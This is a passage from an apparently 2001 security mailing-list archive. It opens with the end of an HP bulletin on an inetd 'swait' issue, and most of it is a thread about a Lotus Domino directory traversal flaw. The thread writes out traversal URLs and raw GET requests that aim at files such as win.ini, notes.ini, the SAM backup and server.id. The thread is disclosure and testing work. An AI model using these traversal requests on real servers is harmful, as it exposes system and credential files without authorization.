  A server that uses the 'swait' state in the /etc/inetd.conf file
  can be made to interfere with one or more services started by
  inetd.  This affects only installations where configuration
  alterations have been done to include 'swait' service entries.
  The standard configuration of the Internet Services product,
  InternetSrvcs, provided by Hewlett-Packard, including telnetd,
  ftpd, rlogind, etc., will not exhibit the behavior in question.

B. Recommended solution
  The problem can be rectified by installing one of the following
  patches. PHNE_20747 for HP-UX release 10.20; or
   PHNE_21699 for VVOS release  10.24; or
   PHNE_21835 for HP-UX release 11.00; or
   PHNE_23068 for HP-UX release 11.04.

   C. To subscribe to automatically receive future NEW HP Security
  Bulletins from the HP IT Resource Center via electronic mail,
  do the following:

  Use your browser to get to the HP IT Resource Center page
  at:

http://itrc.hp.com

  Under the Maintenance and Support Menu (Electronic Support
  Center):  click on the "more..." link.  Then -

  Use the 'Login' tab at the left side of the screen to login
  using your ID and password.  Check with your system
  administrator to see if you have an existing login or use
  the "Register" button at the left to create a login.  You
  will need to login in order to gain access to many areas of
  the ITRC. Remember to save the User ID assigned to you, and
  your password.

  Under the Maintenance and Support Menu, click on the "more..."
  link.  Under the "Notifications" section (near the bottom of
  the page), select "Support Information Digests".

  To -subscribe- to future HP Security Bulletins or other
  Technical Digests, click the check box (in the left column)
  for the appropriate digest and then click the "Update
  Subscriptions" button at the bottom of the page.

   or

  To -review- bulletins already released, select the link
  (in the middle column) for the appropriate digest.

  To -gain access- to the Security Patch Matrix, select
  the link for "hp security bulletins archive" near the bottom.
  Once in the archive the top link is to our current Security
  Patch Matrix.  Updated daily, this matrix categorizes security
  patches by platform/OS release, and by bulletin to

Re: Lotus Domino 5.0.5 Web Server vulnerability - reading files outside the web root

2001-01-09 Thread Hendrik-Jan Verheij


Regarding this vulnerability:

The problem seems to exist with all versions of lotus 5.04 and up and even
has been confirmed on 4.6.7 (the latest r4 release)
In a standard windows installation situation the url mentioned by George
Guninski will result in the contents of win.ini being displayed, or the file
being downloadable.
After some testing it becomes apparent that the vulnerability only exists on
the drive where the domino program files reside. This means your system
drive if you haven't changed the installer's defaults.
If one has changed the defaults, an url like
http://yourvictim/.nsf/../lotus/domino/notes.ini will still reveal sensitive
information, be it that e.g. /winnt/repair/sam._ cannot be read anymore as
these files are on your system drive.
Forming urls like /.nsf/../../ directly on the root of the target's
webserver will trigger domino's security rules unless you are trying to back
out of a subdir (http://target.com/directory/.nsf/../../thefileyouwant)

In a sensible environment you will change the installation defaults to where
you have a separate system disk, a program disk and a data disk. In the
event of a shared program / data disk, your notes server.id (which is not
password protected) is still for grabs.

So far this vulnerability has  been confirmed on nt4 / win2000 / s390 /
as400 / linux / solaris. (Not all have been tested by me).

I have to agree with Thom Dyson when it comes to announcing this
vulnerability 48 hours after it's discovery.

regards,

Hendrik-Jan Verheij  http://redheat.org
Hostmaster Popin Internet+31074 2555660
[EMAIL PROTECTED]http://www.popin.nl
Assimilation is irrelevant, You are futile!

- Original Message -
From: "Ben Greenbaum" <[EMAIL PROTECTED]>
To: <[EMAIL PROTECTED]>
Sent: Monday, January 08, 2001 5:17 PM
Subject: Re: Lotus Domino 5.0.5 Web Server vulnerability - reading files
outside the web root


> Summary of responses:
>
> ---
> From: [EMAIL PROTECTED]
>
> I just tested this on our Domino 5.0.5 boxes running on Windows NT 4.0
(service
> pack 6a) and it did not work. Here is the error message I got:
>
> Error 0
>
> Forbidden - URL containing .. forbidden [don't try to break in]
>
> ---
> From: "Cristi Dumitrescu" <[EMAIL PROTECTED]>
>
> Tried on a Windows NT 4 machine with the same version of Domino and it
does
> not work.
> Telnet session transcript:
> GET .nsf/../winnt/win.ini HTTP/1.0
>
> HTTP/1.1 404 Not found - file doesn't exist or is read protected [even
tried
> multi]
>
>
> GET .nsf/../../winnt/win.ini HTTP/1.0
>
> HTTP/1.1 500 Forbidden - URL containing .. forbidden [don't try to break
in]
>
> ---
> From: <[EMAIL PROTECTED]>
>
> A few quick followups
>
>  1/ this vulnerability is also confirmed on Domino 5.0 (original
> release)
>  2/ this vulnerability is also confirmed on NT4
>  3/ it appears that this vulnerability does NOT affect Domino 5.0.5 on
> Linux
>
> ---
> From: John Cardona <[EMAIL PROTECTED]>
>
> I test Lotus Dominio 5.0 Under NT4.0 Service Pack 6a and it has the same
> vulnerability.
>
> ---
> From: [EMAIL PROTECTED]
>
> Could not reproduce on Domino 5.0.5 nor 5.0.4 under Windows NT 4 (SP 5 or
> 6a - don't know for sure).
>
> -
> http://TARGETDOMINO/.nsf/../winnt/win.ini
> -
>
> Gives a 404 error
>
> -
> http://TARGETDOMINO/../winnt/win.ini
> -
>
> Gives a "Error 0 Forbidden - URL containing .. forbidden [don't try to
> break in]"
>
> Might be a result configuration options in either Domino or NT.  Servers
> checked have "Allow HTTP clients to browse databases:" set to NO.
>
> As an aside, I object to announcing such a potentially damaging
> vulnerability only 48 hours after the vendor was contacted.
>
> Thom Dyson
> Director of Information Services
> Sybex, Inc.
>
> ---
> From: "Philip Wagenaar" <[EMAIL PROTECTED]>
>
> I have tried the exploit on several Lotus Domoni 5.0.5 web servers but I
> wasnt able to reproduce the problem
>
> ---
> From: [EMAIL PROTECTED]
>
> NT 4 (german) SP5 is vulnerable too, but Dominos below 5.0.4 doesn`t seem
> to have this malfunction.
>
> it was possible to get any file instead of NSFs, any suggestions why?
could
> it be possible to change the partition?
>
>
> ---
>
>
>
> Ben Greenbaum
> Director of Site Content
> SecurityFocus
> http://www.securityfocus.com
>

summercon 2001 announce

Re: [reiserfs-list] major security bug in reiserfs (may affect SuSE Linux)

Re: [reiserfs-list] major security bug in reiserfs (may affect SuSE Linux)

Re: [reiserfs-list] major security bug in reiserfs (may affect SuSE Linux)

major security bug in reiserfs (may affect SuSE Linux)

Re: Audiogalaxy.com mp3 sharing software

Re: Cgisecurity.com Advisory #3.1

Re: Solaris /usr/lib/exrecover buffer overflow

Memory leakage in ProFTPd leads to remote DoS (SIZE FTP); (Exploit Code)

Re: Audiogalaxy.com mp3 sharing software

Re: bugtraq id 2173 Lotus Domino Server

Re: New DDoS?

Solaris /usr/lib/exrecover buffer overflow

Re: New DDoS?

Re: New DDoS?

Lotus Domino 5.0.5 Web Server vulnerability WORK AROUNDS

Re: New DDoS?

Re: /usr/sbin/audlinks vulnerability

Re: HP/UX FTP format string vulnerability

WORKAROUND: Lotus Domino 5.0.5 Web Server vulnerability

Re: Hidden sniffer on unplumb'ed interface on Solaris

Re: Lotus Domino 5.0.5 Web Server vulnerability - who cannot reproduce, and others

bugtraq id 2173 Lotus Domino Server

Re: analysis of auditable port scanning techniques

Workaround: Lotus Domino Server Directory Traversal Vulnerability (2173)

New DDoS?

Oracle XSQL servlet and xml-stylesheet allow executing java on the web server

Advisory #3 link error

Summary: Shockwave overflow

Audiogalaxy.com mp3 sharing software

NSFOCUS SA2001-01: NetScreen Firewall WebUI Buffer Overflow vulnerability

pidentd 3.0.12 port exclusion patch

Re: wuftpd 2.6.1 -- example of bad coding

Cgisecurity.com Advisory #3.1

security bulletins digest (fwd)

Re: Lotus Domino 5.0.5 Web Server vulnerability - reading files outside the web root

36 matches

Site Navigation

Mail list logo

Footer information